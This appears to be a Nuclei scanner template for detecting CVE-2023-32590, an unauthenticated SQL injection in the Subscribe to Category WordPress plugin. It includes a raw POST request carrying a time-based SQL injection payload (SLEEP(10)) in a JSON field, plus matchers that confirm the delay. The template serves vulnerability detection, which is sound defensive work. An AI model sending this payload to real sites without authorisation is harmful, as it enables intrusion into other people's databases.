id: CVE-2023-32590 info: name: Subscribe to Category <= 2.7.4 - SQL Injection author: Shivam Kamboj severity: critical description: | The Subscribe to Category contains a sql_injection caused by improper neutralization of special elements used in an SQL command, letting attackers execute arbitrary SQL commands, exploit requires user interaction. impact: | Attackers can execute arbitrary SQL commands, potentially leading to data leakage, modification, or deletion. remediation: | Update to the latest version beyond 2.7.4 or apply security patches that neutralize special elements in SQL queries. reference: - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/subscribe-to-category/subscribe-to-category-274-unauthenticated-sql-injection - https://nvd.nist.gov/vuln/detail/CVE-2023-32590 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L cvss-score: 9.3 cve-id: CVE-2023-32590 epss-score: 0.01808 epss-percentile: 0.778 cwe-id: CWE-89 metadata: verified: true max-request: 1 tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,subscribe-to-category,unauth http: - raw: - | @timeout: 30s POST /wp-json/textmagic/v1/smsreceived HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"sender": "1' AND (SELECT 1 FROM (SELECT(SLEEP(10)))sqltest) AND '1'='1","text": "test"} matchers: - type: dsl dsl: - 'duration >= 10' - 'len(body) == 0' - 'status_code == 200' - 'contains(content_type, "application/json")' condition: and # digest: 490a0046304402201dbe01fd7467f2c5b7c9694fa96ef1bad9641575ff9f6d12e46d45947be5d34202202a205b43b255d640612f8c05e14c8d366a8b9a5e22065c27fd4cefc97aeb6ff6:922c64590222798bb761d5b6d8e72950